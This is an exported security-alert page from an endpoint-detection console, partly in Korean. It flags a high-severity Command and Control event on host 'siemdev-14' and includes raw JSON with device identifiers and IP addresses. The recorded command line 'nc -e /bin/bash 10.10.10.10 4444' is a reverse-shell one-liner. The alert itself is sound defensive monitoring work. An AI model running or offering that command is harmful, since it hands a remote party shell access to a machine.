Alert Information High
Alert ID
ind:021368f9220b45cdb2760a069897c1c8:1766234322253572130-30103-1293072
Composite ID
84393bf974fd44bda943a25a6a7bc27f:ind:021368f9220b45cdb2760a069897c1c8:1766234322253572130-30103-1293072
설명
Bash has created an interactive terminal for a remote host. Check the process tree to determine if malicious commands were executed and if this access was expected.
호스트
siemdev-14
상태
new
생성 시간
2025-12-20 21:39:44
업데이트 시간
2025-12-20 22:38:44
MITRE ATT&CK
Tactic
Command and Control
Technique
Remote Access Tools
Command Line 
nc -e /bin/bash 10.10.10.10 4444
Raw JSON Data 
{"id":"ind:021368f9220b45cdb2760a069897c1c8:1766234322253572130-30103-1293072","composite_id":"84393bf974fd44bda943a25a6a7bc27f:ind:021368f9220b45cdb2760a069897c1c8:1766234322253572130-30103-1293072","agent_id":"021368f9220b45cdb2760a069897c1c8","cid":"84393bf974fd44bda943a25a6a7bc27f","description":"Bash has created an interactive terminal for a remote host. Check the process tree to determine if malicious commands were executed and if this access was expected.","severity":70,"severity_name":"High","confidence":80,"tactic":"Command and Control","tactic_id":"TA0011","technique":"Remote Access Tools","technique_id":"T1219","cmdline":"nc -e /bin/bash 10.10.10.10 4444","filename":"ncat","filepath":"/usr/bin/ncat","sha256":"0d1d840333cfc9856bb17e3b93a77cfd0718e08e75f8df146e85bdf2f1a2af8e","status":"new","type":"ldt","created_timestamp":"2025-12-20T12:39:44.816149362Z","updated_timestamp":"2025-12-20T13:38:44.826366321Z","device":{"device_id":"021368f9220b45cdb2760a069897c1c8","cid":"84393bf974fd44bda943a25a6a7bc27f","agent_version":"7.31.18410.0","hostname":"siemdev-14","local_ip":"172.17.0.1","external_ip":"211.198.135.5","mac_address":"16-bc-32-c0-b2-f4","platform_name":"Linux","os_version":"Rocky Linux 10.1"},"aggregate_id":"aggind:021368f9220b45cdb2760a069897c1c8:25800014102","CreatedAt":"2025-12-20T21:39:44.8161494+09:00","UpdatedAt":"2025-12-20T22:38:44.8263663+09:00"}
Quick Info
  • Severity High
  • Score 70
  • Agent ID 021368f9220b45cdb2760a069897c1c8
Actions
Falcon Console에서 보기 목록으로 돌아가기